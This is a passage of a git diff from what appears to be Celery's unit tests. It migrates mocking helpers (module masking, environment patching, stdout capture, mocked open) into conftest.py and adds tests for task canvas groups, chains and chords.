@@ -113,7 +137,6 @@ def app(celery_app):
def AAA_disable_multiprocessing():
# pytest-cov breaks if a multiprocessing.Process is started,
# so disable them completely to make sure it doesn't happen.
- from unittest.mock import patch
stuff = [
'multiprocessing.Process',
'billiard.Process',
@@ -326,3 +349,447 @@ def import_all_modules(name=__name__, file=__file__,
'Ignored error importing module {}: {!r}'.format(
module, exc,
)))
+
+
+@pytest.fixture
+def sleepdeprived(request):
+ """Mock sleep method in patched module to do nothing.
+
+ Example:
+ >>> import time
+ >>> @pytest.mark.sleepdeprived_patched_module(time)
+ >>> def test_foo(self, sleepdeprived):
+ >>> pass
+ """
+ module = request.node.get_closest_marker(
+ "sleepdeprived_patched_module").args[0]
+ old_sleep, module.sleep = module.sleep, noop
+ try:
+ yield
+ finally:
+ module.sleep = old_sleep
+
+
+# Taken from
+# http://bitbucket.org/runeh/snippets/src/tip/missing_modules.py
+@pytest.fixture
+def mask_modules(request):
+ """Ban some modules from being importable inside the context
+ For example::
+ >>> @pytest.mark.masked_modules('gevent.monkey')
+ >>> def test_foo(self, mask_modules):
+ ... try:
+ ... import sys
+ ... except ImportError:
+ ... print('sys not found')
+ sys not found
+ """
+ realimport = builtins.__import__
+ modnames = request.node.get_closest_marker("masked_modules").args
+
+ def myimp(name, *args, **kwargs):
+ if name in modnames:
+ raise ImportError('No module named %s' % name)
+ else:
+ return realimport(name, *args, **kwargs)
+
+ builtins.__import__ = myimp
+ try:
+ yield
+ finally:
+ builtins.__import__ = realimport
+
+
+@pytest.fixture
+def environ(request):
+ """Mock environment variable value.
+ Example::
+ >>> @pytest.mark.patched_environ('DJANGO_SETTINGS_MODULE', 'proj.settings')
+ >>> def test_other_settings(self, environ):
+ ... ...
+ """
+ env_name, env_value = request.node.get_closest_marker("patched_environ").args
+ prev_val = os.environ.get(env_name, SENTINEL)
+ os.environ[env_name] = env_value
+ try:
+ yield
+ finally:
+ if prev_val is SENTINEL:
+ os.environ.pop(env_name, None)
+ else:
+ os.environ[env_name] = prev_val
+
+
+def replace_module_value(module, name, value=None):
+ """Mock module value, given a module, attribute name and value.
+
+ Example::
+
+ >>> replace_module_value(module, 'CONSTANT', 3.03)
+ """
+ has_prev = hasattr(module, name)
+ prev = getattr(module, name, None)
+ if value:
+ setattr(module, name, value)
+ else:
+ try:
+ delattr(module, name)
+ except AttributeError:
+ pass
+ try:
+ yield
+ finally:
+ if prev is not None:
+ setattr(module, name, prev)
+ if not has_prev:
+ try:
+ delattr(module, name)
+ except AttributeError:
+ pass
+
+
+@contextmanager
+def platform_pyimp(value=None):
+ """Mock :data:`platform.python_implementation`
+ Example::
+ >>> with platform_pyimp('PyPy'):
+ ... ...
+ """
+ yield from replace_module_value(platform, 'python_implementation', value)
+
+
+@contextmanager
+def sys_platform(value=None):
+ """Mock :data:`sys.platform`
+
+ Example::
+        >>> with sys_platform('darwin'):
+ ... ...
+ """
+ prev, sys.platform = sys.platform, value
+ try:
+ yield
+ finally:
+ sys.platform = prev
+
+
+@contextmanager
+def pypy_version(value=None):
+ """Mock :data:`sys.pypy_version_info`
+
+ Example::
+ >>> with pypy_version((3, 6, 1)):
+ ... ...
+ """
+ yield from replace_module_value(sys, 'pypy_version_info', value)
+
+
+def _restore_logging():
+ outs = sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__
+ root = logging.getLogger()
+ level = root.level
+ handlers = root.handlers
+
+ try:
+ yield
+ finally:
+ sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__ = outs
+ root.level = level
+ root.handlers[:] = handlers
+
+
+@contextmanager
+def restore_logging_context_manager():
+ """Restore root logger handlers after test returns.
+ Example::
+ >>> with restore_logging_context_manager():
+ ... setup_logging()
+ """
+ yield from _restore_logging()
+
+
+@pytest.fixture
+def restore_logging(request):
+ """Restore root logger handlers after test returns.
+ Example::
+ >>> def test_foo(self, restore_logging):
+ ... setup_logging()
+ """
+ yield from _restore_logging()
+
+
+@pytest.fixture
+def module(request):
+ """Mock one or modules such that every attribute is a :class:`Mock`."""
+ yield from _module(*request.node.get_closest_marker("patched_module").args)
+
+
+@contextmanager
+def module_context_manager(*names):
+ """Mock one or modules such that every attribute is a :class:`Mock`."""
+ yield from _module(*names)
+
+
+def _module(*names):
+ prev = {}
+
+ class MockModule(types.ModuleType):
+
+ def __getattr__(self, attr):
+ setattr(self, attr, Mock())
+ return types.ModuleType.__getattribute__(self, attr)
+
+ mods = []
+ for name in names:
+ try:
+ prev[name] = sys.modules[name]
+ except KeyError:
+ pass
+ mod = sys.modules[name] = MockModule(name)
+ mods.append(mod)
+ try:
+ yield mods
+ finally:
+ for name in names:
+ try:
+ sys.modules[name] = prev[name]
+ except KeyError:
+ try:
+                    del sys.modules[name]
+ except KeyError:
+ pass
+
+
+class _patching:
+
+ def __init__(self, monkeypatch, request):
+ self.monkeypatch = monkeypatch
+ self.request = request
+
+ def __getattr__(self, name):
+ return getattr(self.monkeypatch, name)
+
+ def __call__(self, path, value=SENTINEL, name=None,
+ new=MagicMock, **kwargs):
+ value = self._value_or_mock(value, new, name, path, **kwargs)
+ self.monkeypatch.setattr(path, value)
+ return value
+
+ def object(self, target, attribute, *args, **kwargs):
+ return _wrap_context(
+ patch.object(target, attribute, *args, **kwargs),
+ self.request)
+
+ def _value_or_mock(self, value, new, name, path, **kwargs):
+ if value is SENTINEL:
+ value = new(name=name or path.rpartition('.')[2])
+ for k, v in kwargs.items():
+ setattr(value, k, v)
+ return value
+
+ def setattr(self, target, name=SENTINEL, value=SENTINEL, **kwargs):
+ # alias to __call__ with the interface of pytest.monkeypatch.setattr
+ if value is SENTINEL:
+ value, name = name, None
+ return self(target, value, name=name)
+
+ def setitem(self, dic, name, value=SENTINEL, new=MagicMock, **kwargs):
+ # same as pytest.monkeypatch.setattr but default value is MagicMock
+ value = self._value_or_mock(value, new, name, dic, **kwargs)
+ self.monkeypatch.setitem(dic, name, value)
+ return value
+
+ def modules(self, *mods):
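+        # Expand each dotted name so every parent package is mocked too,
+        # e.g. 'django.core.checks' also installs mock modules for
+        # 'django' and 'django.core'.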
+ modules = []
+ for mod in mods:
+ mod = mod.split('.')
+ modules.extend(reversed([
+ '.'.join(mod[:-i] if i else mod) for i in range(len(mod))
+ ]))
+ modules = sorted(set(modules))
+ return _wrap_context(module_context_manager(*modules), self.request)
+
+
+def _wrap_context(context, request):
+ ret = context.__enter__()
+
+ def fin():
+ context.__exit__(*sys.exc_info())
+ request.addfinalizer(fin)
+ return ret
+
+
+@pytest.fixture()
+def patching(monkeypatch, request):
+ """Monkeypath.setattr shortcut.
+ Example:
+ .. code-block:: python
+ >>> def test_foo(patching):
+ >>> # execv value here will be mock.MagicMock by default.
+ >>> execv = patching('os.execv')
+ >>> patching('sys.platform', 'darwin') # set concrete value
+ >>> patching.setenv('DJANGO_SETTINGS_MODULE', 'x.settings')
+ >>> # val will be of type mock.MagicMock by default
+ >>> val = patching.setitem('path.to.dict', 'KEY')
+ """
+ return _patching(monkeypatch, request)
+
+
+@contextmanager
+def stdouts():
+ """Override `sys.stdout` and `sys.stderr` with `StringIO`
+ instances.
+ >>> with conftest.stdouts() as (stdout, stderr):
+ ... something()
+ ... self.assertIn('foo', stdout.getvalue())
+ """
+ prev_out, prev_err = sys.stdout, sys.stderr
+ prev_rout, prev_rerr = sys.__stdout__, sys.__stderr__
+ mystdout, mystderr = WhateverIO(), WhateverIO()
+ sys.stdout = sys.__stdout__ = mystdout
+ sys.stderr = sys.__stderr__ = mystderr
+
+ try:
+ yield mystdout, mystderr
+ finally:
+ sys.stdout = prev_out
+ sys.stderr = prev_err
+ sys.__stdout__ = prev_rout
+ sys.__stderr__ = prev_rerr
+
+
+@contextmanager
+def reset_modules(*modules):
+ """Remove modules from :data:`sys.modules` by name,
+ and reset back again when the test/context returns.
+ Example::
+ >>> with conftest.reset_modules('celery.result', 'celery.app.base'):
+ ... pass
+ """
+ prev = {
+ k: sys.modules.pop(k) for k in modules if k in sys.modules
+ }
+
+ try:
+ for k in modules:
+ reload(import_module(k))
+ yield
+ finally:
+ sys.modules.update(prev)
+
+
+def get_logger_handlers(logger):
+ return [
+ h for h in logger.handlers
+ if not isinstance(h, logging.NullHandler)
+ ]
+
+
+@contextmanager
+def wrap_logger(logger, loglevel=logging.ERROR):
+ """Wrap :class:`logging.Logger` with a StringIO() handler.
+    Yields a StringIO handle.
+ Example::
+ >>> with conftest.wrap_logger(logger, loglevel=logging.DEBUG) as sio:
+ ... ...
+ ... sio.getvalue()
+ """
+ old_handlers = get_logger_handlers(logger)
+ sio = WhateverIO()
+ siohandler = logging.StreamHandler(sio)
+ logger.handlers = [siohandler]
+
+ try:
+ yield sio
+ finally:
+ logger.handlers = old_handlers
+
+
+@contextmanager
+def _mock_context(mock):
+ context = mock.return_value = Mock()
+ context.__enter__ = Mock()
+ context.__exit__ = Mock()
+
+ def on_exit(*x):
+ if x[0]:
+ raise x[0] from x[1]
+ context.__exit__.side_effect = on_exit
+ context.__enter__.return_value = context
+ try:
+ yield context
+ finally:
+ context.reset()
+
+
+@contextmanager
+def open(side_effect=None):
+ """Patch builtins.open so that it returns StringIO object.
+ :param side_effect: Additional side effect for when the open context
+ is entered.
+ Example::
+ >>> with mock.open(io.BytesIO) as open_fh:
+ ... something_opening_and_writing_bytes_to_a_file()
+ ... self.assertIn(b'foo', open_fh.getvalue())
+ """
+ with patch('builtins.open') as open_:
+ with _mock_context(open_) as context:
+ if side_effect is not None:
+ context.__enter__.side_effect = side_effect
+ val = context.__enter__.return_value = WhateverIO()
+ val.__exit__ = Mock()
+ yield val
+
+
+@contextmanager
+def module_exists(*modules):
+ """Patch one or more modules to ensure they exist.
+ A module name with multiple paths (e.g. gevent.monkey) will
+ ensure all parent modules are also patched (``gevent`` +
+ ``gevent.monkey``).
+ Example::
+ >>> with conftest.module_exists('gevent.monkey'):
+ ... gevent.monkey.patch_all = Mock(name='patch_all')
+ ... ...
+ """
+ gen = []
+ old_modules = []
+ for module in modules:
+ if isinstance(module, str):
+ module = types.ModuleType(module)
+ gen.append(module)
+ if module.__name__ in sys.modules:
+ old_modules.append(sys.modules[module.__name__])
+ sys.modules[module.__name__] = module
+ name = module.__name__
+ if '.' in name:
+ parent, _, attr = name.rpartition('.')
+ setattr(sys.modules[parent], attr, module)
+ try:
+ yield
+ finally:
+ for module in gen:
+ sys.modules.pop(module.__name__, None)
+ for module in old_modules:
+ sys.modules[module.__name__] = module
+
+
+def _bind(f, o):
+ @wraps(f)
+ def bound_meth(*fargs, **fkwargs):
+ return f(o, *fargs, **fkwargs)
+ return bound_meth
+
+
+class MockCallbacks:
+
+ def __new__(cls, *args, **kwargs):
+ r = Mock(name=cls.__name__)
+ cls.__init__(r, *args, **kwargs)
+ for key, value in vars(cls).items():
+ if key not in ('__dict__', '__weakref__', '__new__', '__init__'):
+ if inspect.ismethod(value) or inspect.isfunction(value):
+ r.__getattr__(key).side_effect = _bind(value, r)
+ else:
+ r.__setattr__(key, value)
+ return r
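+
+
+# Illustrative sketch (not exercised by the suite) of how ``MockCallbacks``
+# is meant to be used: subclasses produce a ``Mock`` whose methods still run
+# the real implementations, so both side effects and call recording work::
+#
+#     class Consumer(MockCallbacks):
+#         def __init__(self, name):
+#             self.name = name
+#
+#         def start(self):
+#             return self.name
+#
+#     consumer = Consumer('tasks')
+#     assert consumer.start() == 'tasks'
+#     consumer.start.assert_called_once_with()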
diff --git a/t/unit/contrib/test_migrate.py b/t/unit/contrib/test_migrate.py
index e36e2f32751..2e395057462 100644
--- a/t/unit/contrib/test_migrate.py
+++ b/t/unit/contrib/test_migrate.py
@@ -3,7 +3,6 @@
import pytest
from amqp import ChannelError
-from case import mock
from kombu import Connection, Exchange, Producer, Queue
from kombu.transport.virtual import QoS
from kombu.utils.encoding import ensure_bytes
@@ -14,6 +13,7 @@
migrate_tasks, move, move_by_idmap,
move_by_taskmap, move_task_by_id,
start_filter, task_id_eq, task_id_in)
+from t.unit import conftest
# hack to ignore error at shutdown
QoS.restore_at_shutdown = False
@@ -203,7 +203,7 @@ def test_maybe_queue():
def test_filter_status():
- with mock.stdouts() as (stdout, stderr):
+ with conftest.stdouts() as (stdout, stderr):
filter_status(State(), {'id': '1', 'task': 'add'}, Mock())
assert stdout.getvalue()
diff --git a/t/unit/contrib/test_sphinx.py b/t/unit/contrib/test_sphinx.py
index de0d04aa5af..a4d74e04465 100644
--- a/t/unit/contrib/test_sphinx.py
+++ b/t/unit/contrib/test_sphinx.py
@@ -21,7 +21,6 @@ def test_sphinx():
app = TestApp(srcdir=SRCDIR, confdir=SRCDIR)
app.build()
contents = open(os.path.join(app.outdir, 'contents.html'),
- mode='r',
encoding='utf-8').read()
assert 'This is a sample Task' in contents
assert 'This is a sample Shared Task' in contents
diff --git a/t/unit/events/test_snapshot.py b/t/unit/events/test_snapshot.py
index 95b56aca3b5..3dfb01846e9 100644
--- a/t/unit/events/test_snapshot.py
+++ b/t/unit/events/test_snapshot.py
@@ -1,7 +1,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.app.events import Events
from celery.events.snapshot import Polaroid, evcam
@@ -106,8 +105,7 @@ def setup(self):
self.app.events = self.MockEvents()
self.app.events.app = self.app
- @mock.restore_logging()
- def test_evcam(self):
+ def test_evcam(self, restore_logging):
evcam(Polaroid, timer=timer, app=self.app)
evcam(Polaroid, timer=timer, loglevel='CRITICAL', app=self.app)
self.MockReceiver.raise_keyboard_interrupt = True
diff --git a/t/unit/fixups/test_django.py b/t/unit/fixups/test_django.py
index e352b8a7b2f..44938b1a04f 100644
--- a/t/unit/fixups/test_django.py
+++ b/t/unit/fixups/test_django.py
@@ -2,10 +2,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.fixups.django import (DjangoFixup, DjangoWorkerFixup,
FixupWarning, _maybe_close_fd, fixup)
+from t.unit import conftest
class FixupCase:
@@ -54,6 +54,18 @@ def test_autodiscover_tasks(self, patching):
apps.get_app_configs.return_value = configs
assert f.autodiscover_tasks() == [c.name for c in configs]
+ @pytest.mark.masked_modules('django')
+ def test_fixup_no_django(self, patching, mask_modules):
+ with patch('celery.fixups.django.DjangoFixup') as Fixup:
+ patching.setenv('DJANGO_SETTINGS_MODULE', '')
+ fixup(self.app)
+ Fixup.assert_not_called()
+
+ patching.setenv('DJANGO_SETTINGS_MODULE', 'settings')
+ with pytest.warns(FixupWarning):
+ fixup(self.app)
+ Fixup.assert_not_called()
+
def test_fixup(self, patching):
with patch('celery.fixups.django.DjangoFixup') as Fixup:
patching.setenv('DJANGO_SETTINGS_MODULE', '')
@@ -61,11 +73,7 @@ def test_fixup(self, patching):
Fixup.assert_not_called()
patching.setenv('DJANGO_SETTINGS_MODULE', 'settings')
- with mock.mask_modules('django'):
- with pytest.warns(FixupWarning):
- fixup(self.app)
- Fixup.assert_not_called()
- with mock.module_exists('django'):
+ with conftest.module_exists('django'):
import django
django.VERSION = (1, 11, 1)
fixup(self.app)
@@ -257,17 +265,17 @@ def test_on_worker_ready(self):
f._settings.DEBUG = True
f.on_worker_ready()
- def test_validate_models(self, patching):
- with mock.module('django', 'django.db', 'django.core',
- 'django.core.cache', 'django.conf',
- 'django.db.utils'):
- f = self.Fixup(self.app)
- f.django_setup = Mock(name='django.setup')
- patching.modules('django.core.checks')
- from django.core.checks import run_checks
- f.validate_models()
- f.django_setup.assert_called_with()
- run_checks.assert_called_with()
+ @pytest.mark.patched_module('django', 'django.db', 'django.core',
+ 'django.core.cache', 'django.conf',
+ 'django.db.utils')
+ def test_validate_models(self, patching, module):
+ f = self.Fixup(self.app)
+ f.django_setup = Mock(name='django.setup')
+ patching.modules('django.core.checks')
+ from django.core.checks import run_checks
+ f.validate_models()
+ f.django_setup.assert_called_with()
+ run_checks.assert_called_with()
def test_django_setup(self, patching):
patching('celery.fixups.django.symbol_by_name')
diff --git a/t/unit/security/test_certificate.py b/t/unit/security/test_certificate.py
index a52980422e8..d9f525dad25 100644
--- a/t/unit/security/test_certificate.py
+++ b/t/unit/security/test_certificate.py
@@ -3,10 +3,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.exceptions import SecurityError
from celery.security.certificate import Certificate, CertStore, FSCertStore
+from t.unit import conftest
from . import CERT1, CERT2, KEY1
from .case import SecurityCase
@@ -38,7 +38,7 @@ def test_has_expired_mock(self):
x = Certificate(CERT1)
x._cert = Mock(name='cert')
- time_after = datetime.datetime.now() + datetime.timedelta(days=-1)
+ time_after = datetime.datetime.utcnow() + datetime.timedelta(days=-1)
x._cert.not_valid_after = time_after
assert x.has_expired() is True
@@ -47,7 +47,7 @@ def test_has_not_expired_mock(self):
x = Certificate(CERT1)
x._cert = Mock(name='cert')
- time_after = datetime.datetime.now() + datetime.timedelta(days=1)
+ time_after = datetime.datetime.utcnow() + datetime.timedelta(days=1)
x._cert.not_valid_after = time_after
assert x.has_expired() is False
@@ -84,7 +84,7 @@ def test_init(self, Certificate, glob, isdir):
cert.has_expired.return_value = False
isdir.return_value = True
glob.return_value = ['foo.cert']
- with mock.open():
+ with conftest.open():
cert.get_id.return_value = 1
path = os.path.join('var', 'certs')
diff --git a/t/unit/security/test_security.py b/t/unit/security/test_security.py
index 31d682e37be..0b75ffc3619 100644
--- a/t/unit/security/test_security.py
+++ b/t/unit/security/test_security.py
@@ -19,13 +19,13 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from kombu.exceptions import SerializerNotInstalled
from kombu.serialization import disable_insecure_serializers, registry
from celery.exceptions import ImproperlyConfigured, SecurityError
from celery.security import disable_untrusted_serializers, setup_security
from celery.security.utils import reraise_errors
+from t.unit import conftest
from . import CERT1, KEY1
from .case import SecurityCase
@@ -120,7 +120,7 @@ def effect(*args):
self.app.conf.task_serializer = 'auth'
self.app.conf.accept_content = ['auth']
- with mock.open(side_effect=effect):
+ with conftest.open(side_effect=effect):
with patch('celery.security.registry') as registry:
store = Mock()
self.app.setup_security(['json'], key, cert, store)
diff --git a/t/unit/tasks/test_canvas.py b/t/unit/tasks/test_canvas.py
index 53f98615e8e..ca2d0384257 100644
--- a/t/unit/tasks/test_canvas.py
+++ b/t/unit/tasks/test_canvas.py
@@ -1,7 +1,8 @@
import json
-from unittest.mock import MagicMock, Mock
+from unittest.mock import ANY, MagicMock, Mock, call, patch, sentinel
import pytest
+import pytest_subtests # noqa: F401
from celery._state import _task_stack
from celery.canvas import (Signature, _chain, _maybe_group, chain, chord,
@@ -90,7 +91,7 @@ def test_reduce(self):
assert fun(*args) == x
def test_replace(self):
- x = Signature('TASK', ('A'), {})
+ x = Signature('TASK', ('A',), {})
assert x.replace(args=('B',)).args == ('B',)
assert x.replace(kwargs={'FOO': 'BAR'}).kwargs == {
'FOO': 'BAR',
@@ -154,6 +155,29 @@ def test_merge_immutable(self):
assert kwargs == {'foo': 1}
assert options == {'task_id': 3}
+ def test_merge_options__none(self):
+ sig = self.add.si()
+ _, _, new_options = sig._merge()
+ assert new_options is sig.options
+ _, _, new_options = sig._merge(options=None)
+ assert new_options is sig.options
+
+ @pytest.mark.parametrize("immutable_sig", (True, False))
+ def test_merge_options__group_id(self, immutable_sig):
+ # This is to avoid testing the behaviour in `test_set_immutable()`
+ if immutable_sig:
+ sig = self.add.si()
+ else:
+ sig = self.add.s()
+ # If the signature has no group ID, it can be set
+ assert not sig.options
+ _, _, new_options = sig._merge(options={"group_id": sentinel.gid})
+ assert new_options == {"group_id": sentinel.gid}
+ # But if one is already set, the new one is silently ignored
+ sig.set(group_id=sentinel.old_gid)
+ _, _, new_options = sig._merge(options={"group_id": sentinel.new_gid})
+ assert new_options == {"group_id": sentinel.old_gid}
+
def test_set_immutable(self):
x = self.add.s(2, 2)
assert not x.immutable
@@ -303,13 +327,9 @@ def test_from_dict_no_tasks(self):
def test_from_dict_full_subtasks(self):
c = chain(self.add.si(1, 2), self.add.si(3, 4), self.add.si(5, 6))
-
serialized = json.loads(json.dumps(c))
-
deserialized = chain.from_dict(serialized)
-
- for task in deserialized.tasks:
- assert isinstance(task, Signature)
+ assert all(isinstance(task, Signature) for task in deserialized.tasks)
@pytest.mark.usefixtures('depends_on_current_app')
def test_app_falls_back_to_default(self):
@@ -322,9 +342,8 @@ def test_handles_dicts(self):
)
c.freeze()
tasks, _ = c._frozen
- for task in tasks:
- assert isinstance(task, Signature)
- assert task.app is self.app
+ assert all(isinstance(task, Signature) for task in tasks)
+ assert all(task.app is self.app for task in tasks)
def test_groups_in_chain_to_chord(self):
g1 = group([self.add.s(2, 2), self.add.s(4, 4)])
@@ -535,6 +554,48 @@ def test_append_to_empty_chain(self):
assert x.apply().get() == 3
+ @pytest.mark.usefixtures('depends_on_current_app')
+ def test_chain_single_child_result(self):
+ child_sig = self.add.si(1, 1)
+ chain_sig = chain(child_sig)
+ assert chain_sig.tasks[0] is child_sig
+
+ with patch.object(
+ # We want to get back the result of actually applying the task
+ child_sig, "apply_async",
+ ) as mock_apply, patch.object(
+            # The child signature may be cloned by `chain.prepare_steps()`
+ child_sig, "clone", return_value=child_sig,
+ ):
+ res = chain_sig()
+ # `_prepare_chain_from_options()` sets this `chain` kwarg with the
+ # subsequent tasks which would be run - nothing in this case
+ mock_apply.assert_called_once_with(chain=[])
+ assert res is mock_apply.return_value
+
+ @pytest.mark.usefixtures('depends_on_current_app')
+ def test_chain_single_child_group_result(self):
+ child_sig = self.add.si(1, 1)
+ # The group will `clone()` the child during instantiation so mock it
+ with patch.object(child_sig, "clone", return_value=child_sig):
+ group_sig = group(child_sig)
+ # Now we can construct the chain signature which is actually under test
+ chain_sig = chain(group_sig)
+ assert chain_sig.tasks[0].tasks[0] is child_sig
+
+ with patch.object(
+ # We want to get back the result of actually applying the task
+ child_sig, "apply_async",
+ ) as mock_apply, patch.object(
+            # The child signature may be cloned by `chain.prepare_steps()`
+ child_sig, "clone", return_value=child_sig,
+ ):
+ res = chain_sig()
+ # `_prepare_chain_from_options()` sets this `chain` kwarg with the
+ # subsequent tasks which would be run - nothing in this case
+ mock_apply.assert_called_once_with(chain=[])
+ assert res is mock_apply.return_value
+
class test_group(CanvasCase):
@@ -593,15 +654,19 @@ def test_link(self):
g1 = group(Mock(name='t1'), Mock(name='t2'), app=self.app)
sig = Mock(name='sig')
g1.link(sig)
+ # Only the first child signature of a group will be given the callback
+ # and it is cloned and made immutable to avoid passing results to it,
+ # since that first task can't pass along its siblings' return values
g1.tasks[0].link.assert_called_with(sig.clone().set(immutable=True))
def test_link_error(self):
g1 = group(Mock(name='t1'), Mock(name='t2'), app=self.app)
sig = Mock(name='sig')
g1.link_error(sig)
- g1.tasks[0].link_error.assert_called_with(
- sig.clone().set(immutable=True),
- )
+ # We expect that all group children will be given the errback to ensure
+ # it gets called
+ for child_sig in g1.tasks:
+ child_sig.link_error.assert_called_with(sig)
def test_apply_empty(self):
x = group(app=self.app)
@@ -633,6 +698,30 @@ def test_from_dict(self):
x['args'] = None
assert group.from_dict(dict(x))
+ def test_from_dict_deep_deserialize(self):
+ original_group = group([self.add.s(1, 2)] * 42)
+ serialized_group = json.loads(json.dumps(original_group))
+ deserialized_group = group.from_dict(serialized_group)
+ assert all(
+ isinstance(child_task, Signature)
+ for child_task in deserialized_group.tasks
+ )
+
+ def test_from_dict_deeper_deserialize(self):
+ inner_group = group([self.add.s(1, 2)] * 42)
+ outer_group = group([inner_group] * 42)
+ serialized_group = json.loads(json.dumps(outer_group))
+ deserialized_group = group.from_dict(serialized_group)
+ assert all(
+ isinstance(child_task, Signature)
+ for child_task in deserialized_group.tasks
+ )
+ assert all(
+ isinstance(grandchild_task, Signature)
+ for child_task in deserialized_group.tasks
+ for grandchild_task in child_task.tasks
+ )
+
def test_call_empty_group(self):
x = group(app=self.app)
assert not len(x())
@@ -697,9 +786,212 @@ def test_kwargs_delay_partial(self):
res = self.helper_test_get_delay(x.delay(y=1))
assert res == [2, 2]
+ def test_apply_from_generator(self):
+ child_count = 42
+ child_sig = self.add.si(0, 0)
+ child_sigs_gen = (child_sig for _ in range(child_count))
+ group_sig = group(child_sigs_gen)
+ with patch("celery.canvas.Signature.apply_async") as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ assert mock_apply_async.call_count == child_count
+ assert len(res_obj.children) == child_count
+
+ # This needs the current app for some reason not worth digging into
+ @pytest.mark.usefixtures('depends_on_current_app')
+ def test_apply_from_generator_empty(self):
+ empty_gen = (False for _ in range(0))
+ group_sig = group(empty_gen)
+ with patch("celery.canvas.Signature.apply_async") as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ assert mock_apply_async.call_count == 0
+ assert len(res_obj.children) == 0
+
+ # In the following tests, getting the group ID is a pain so we just use
+ # `ANY` to wildcard it when we're checking on calls made to our mocks
+ def test_apply_contains_chord(self):
+ gchild_count = 42
+ gchild_sig = self.add.si(0, 0)
+ gchild_sigs = (gchild_sig, ) * gchild_count
+ child_chord = chord(gchild_sigs, gchild_sig)
+ group_sig = group((child_chord, ))
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We only see applies for the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == gchild_count
+ assert len(res_obj.children) == len(group_sig.tasks)
+ # We must have set the chord size for the group of tasks which makes up
+ # the header of the `child_chord`, just before we apply the last task.
+ mock_set_chord_size.assert_called_once_with(ANY, gchild_count)
+
+ def test_apply_contains_chords_containing_chain(self):
+ ggchild_count = 42
+ ggchild_sig = self.add.si(0, 0)
+ gchild_sig = chain((ggchild_sig, ) * ggchild_count)
+ child_count = 24
+ child_chord = chord((gchild_sig, ), ggchild_sig)
+ group_sig = group((child_chord, ) * child_count)
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We only see applies for the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == child_count
+ assert len(res_obj.children) == child_count
+ # We must have set the chord sizes based on the number of tail tasks of
+ # the encapsulated chains - in this case 1 for each child chord
+ mock_set_chord_size.assert_has_calls((call(ANY, 1), ) * child_count)
+
+ @pytest.mark.xfail(reason="Invalid canvas setup with bad exception")
+ def test_apply_contains_chords_containing_empty_chain(self):
+ gchild_sig = chain(tuple())
+ child_count = 24
+ child_chord = chord((gchild_sig, ), self.add.si(0, 0))
+ group_sig = group((child_chord, ) * child_count)
+ # This is an invalid setup because we can't complete a chord header if
+ # there are no actual tasks which will run in it. However, the current
+ # behaviour of an `IndexError` isn't particularly helpful to a user.
+ group_sig.apply_async()
+
+ def test_apply_contains_chords_containing_chain_with_empty_tail(self):
+ ggchild_count = 42
+ ggchild_sig = self.add.si(0, 0)
+ tail_count = 24
+ gchild_sig = chain(
+ (ggchild_sig, ) * ggchild_count +
+ (group((ggchild_sig, ) * tail_count), group(tuple()), ),
+ )
+ child_chord = chord((gchild_sig, ), ggchild_sig)
+ group_sig = group((child_chord, ))
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We only see applies for the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == 1
+ assert len(res_obj.children) == 1
+ # We must have set the chord sizes based on the size of the last
+ # non-empty task in the encapsulated chains - in this case `tail_count`
+ # for the group preceding the empty one in each grandchild chain
+ mock_set_chord_size.assert_called_once_with(ANY, tail_count)
+
+ def test_apply_contains_chords_containing_group(self):
+ ggchild_count = 42
+ ggchild_sig = self.add.si(0, 0)
+ gchild_sig = group((ggchild_sig, ) * ggchild_count)
+ child_count = 24
+ child_chord = chord((gchild_sig, ), ggchild_sig)
+ group_sig = group((child_chord, ) * child_count)
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We see applies for all of the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == child_count * ggchild_count
+ assert len(res_obj.children) == child_count
+ # We must have set the chord sizes based on the number of tail tasks of
+ # the encapsulated groups - in this case `ggchild_count`
+ mock_set_chord_size.assert_has_calls(
+ (call(ANY, ggchild_count), ) * child_count,
+ )
+
+ @pytest.mark.xfail(reason="Invalid canvas setup but poor behaviour")
+ def test_apply_contains_chords_containing_empty_group(self):
+ gchild_sig = group(tuple())
+ child_count = 24
+ child_chord = chord((gchild_sig, ), self.add.si(0, 0))
+ group_sig = group((child_chord, ) * child_count)
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We only see applies for the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == child_count
+ assert len(res_obj.children) == child_count
+ # This is actually kind of meaningless because, similar to the empty
+ # chain test, this is an invalid setup. However, we should probably
+            # expect that the chords are dealt with in some other way rather
+            # than probably being left incomplete forever...
+ mock_set_chord_size.assert_has_calls((call(ANY, 0), ) * child_count)
+
+ def test_apply_contains_chords_containing_chord(self):
+ ggchild_count = 42
+ ggchild_sig = self.add.si(0, 0)
+ gchild_sig = chord((ggchild_sig, ) * ggchild_count, ggchild_sig)
+ child_count = 24
+ child_chord = chord((gchild_sig, ), ggchild_sig)
+ group_sig = group((child_chord, ) * child_count)
+ with patch.object(
